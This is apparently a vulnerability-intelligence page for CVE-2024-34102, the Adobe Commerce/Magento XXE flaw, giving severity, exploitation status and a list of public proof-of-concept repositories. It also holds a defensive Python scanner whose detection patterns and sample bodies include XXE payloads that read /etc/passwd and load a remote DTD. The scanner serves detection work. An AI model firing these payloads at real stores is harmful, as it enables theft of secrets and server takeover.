KEVIntel
CVSS 9.8 Critical

CVE-2024-34102

PUBLISHED

XXE can expose the crypt key and other secrets, granting full admin access

Exploited in the wild · PoC available · Remote · Low complexity · No user interaction
Vendor: Adobe
Product: Adobe Commerce
Published: Jun 13, 2024
EPSS

Description

Adobe Commerce versions 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8 and earlier are affected by an Improper Restriction of XML External Entity Reference ('XXE') vulnerability that could result in arbitrary code execution. An attacker could exploit this vulnerability by sending a crafted XML document that references external entities. Exploitation of this issue does not require user interaction.
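The description says the trigger is a crafted XML document that references external entities. The following screening helper is an added example (it is not KEVIntel's, Adobe's or any PoC author's code) that flags the constructs such a document needs: a DOCTYPE, an external DTD reference, an external or parameter entity, and XInclude. It assumes, as a generalisation this page does not state, that the XML may arrive either as the raw request body or inside a JSON string field, where JSON unicode escapes can hide the angle brackets from a naive filter; all sample bodies are constructed, not captured traffic.

```python
"""Screen request bodies for XML External Entity (XXE) indicators.

Added example, not code from KEVIntel, Adobe or any listed PoC. Flags the
DTD/entity constructs an XXE payload needs, in the raw body and, as an
assumption about the transport, inside JSON string values (where escapes such
as \\u003c can hide the angle brackets).
"""
import json
import re
from typing import Iterator, List

# One pattern per ingredient of an external-entity attack.
_INDICATORS = [
    ("doctype", re.compile(r"<!DOCTYPE\b", re.I)),
    # External DTD reference: <!DOCTYPE x SYSTEM "http://attacker/evil.dtd">.
    # [^\[>]* stops at the internal subset, so SYSTEM inside [...] is not counted here.
    ("external-dtd", re.compile(r"<!DOCTYPE\s+[^\[>]*\b(SYSTEM|PUBLIC)\b", re.I)),
    # External general or parameter entity: <!ENTITY xxe SYSTEM "file:///etc/passwd">.
    ("external-entity", re.compile(r"<!ENTITY\s+(%\s*)?[\w.-]+\s+(SYSTEM|PUBLIC)\b", re.I)),
    # Parameter entities are what out-of-band exfiltration payloads rely on.
    ("parameter-entity", re.compile(r"<!ENTITY\s+%", re.I)),
    # XInclude pulls a local file in without any DOCTYPE at all.
    ("xinclude", re.compile(r"<(\w+:)?include\b[^>]*\bhref\s*=", re.I)),
]


def _candidate_strings(body: str) -> Iterator[str]:
    """Yield the raw body, plus every string value inside it when it parses as JSON."""
    yield body
    try:
        decoded = json.loads(body)
    except ValueError:
        return
    stack = [decoded]
    while stack:
        node = stack.pop()
        if isinstance(node, str):
            yield node
        elif isinstance(node, dict):
            stack.extend(node.values())
        elif isinstance(node, list):
            stack.extend(node)


def scan_body(body: str) -> List[str]:
    """Return the sorted names of all XXE indicators found anywhere in the body."""
    found = set()
    for text in _candidate_strings(body):
        for name, pattern in _INDICATORS:
            if pattern.search(text):
                found.add(name)
    return sorted(found)


def is_suspicious(body: str) -> bool:
    """True when any indicator fires; a DOCTYPE alone is reason enough to block."""
    return bool(scan_body(body))


if __name__ == "__main__":
    # Constructed sample bodies, not captured traffic.
    samples = {
        "benign-json": '{"cart": {"sku": "ABC-1", "qty": 2}}',
        "raw-xxe": '<?xml version="1.0"?><!DOCTYPE r [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><r>&xxe;</r>',
        "json-escaped-xxe": r'{"data": "\u003c!DOCTYPE r [\u003c!ENTITY % p SYSTEM \"http://example.invalid/x.dtd\"> %p;]>\u003cr/>"}',
    }
    for label, body in samples.items():
        print(f"{label}: {scan_body(body)}")
```

The raw-text pass catches ordinary XML; the JSON pass is what makes the escaped variant visible, since `\u003c!DOCTYPE` contains no literal `<` for a regex to match. The application-side fix is unchanged by any of this: the parser must be configured to ignore DOCTYPE declarations and never resolve external entities, and screening is a compensating control in front of it.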

Tags: cisa, nuclei_scanner, metasploit, nessus_scanner

CVSS scores

CVSS v3.1 9.8 Critical

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Exploitation status

Exploited in the wild

Recorded 2024-07-17 00:00:00 UTC

Proof of concept available

Recorded 2024-06-30 16:49:26 UTC

SSVC decision points

Exploitation: active
Automatable: Yes
Technical impact: total

Known exploited vulnerability sources

Catalogues that list this CVE as a known exploited vulnerability.

Source: CISA · Added: Jul 17, 2024

Potential proof of concepts

These PoCs are unverified and could contain malware. Use at your own risk.

magento_xxe_to_glibc_buf_overflow

metasploit · Created Unknown

Metasploit module for CVE-2024-34102

EQSTLab/CVE-2024-34102

github · Created 2024-08-13 07:33:20 UTC · 3 stars

Adobe Commerce XXE exploit

bughuntar/CVE-2024-34102

github · Created 2024-07-13 10:25:23 UTC · 3 stars

Exploitation CVE-2024-34102

jakabakos/CVE-2024-34102-CosmicSting-XXE-in-Adobe-Commerce-and-Magento

github · Created 2024-07-01 08:19:28 UTC · 8 stars

CosmicSting: critical unauthenticated XXE vulnerability in Adobe Commerce and Magento (CVE-2024-34102)

0x0d3ad/CVE-2024-34102

github · Created 2024-06-30 16:49:26 UTC · 2 stars

CVE-2024-34102 (Magento XXE)

Chocapikk/CVE-2024-34102

github · Created 2024-06-28 23:33:21 UTC · 47 stars

CosmicSting (CVE-2024-34102)

11whoami99/CVE-2024-34102

github · Created 2024-06-28 12:45:40 UTC · 3 stars

POC for CVE-2024-34102: Unauthenticated Magento XXE and bypassing WAF. You will get an HTTP connection on your webhook.

bigb0x/CVE-2024-34102

github · Created 2024-06-27 21:57:24 UTC · 32 stars

POC for CVE-2024-34102. A pre-authentication XML entity injection issue in Magento / Adobe Commerce.

th3gokul/CVE-2024-34102

github · Created 2024-06-27 18:10:13 UTC · 14 stars

CVE-2024-34102: Unauthenticated Magento XXE

Timeline

  • CVE ID Reserved

  • CVE Published to Public

  • Proof of Concept Exploit Available

  • Added to KEVIntel

  • Detected by Nessus

  • Detected by Nuclei

  • Detected by Metasploit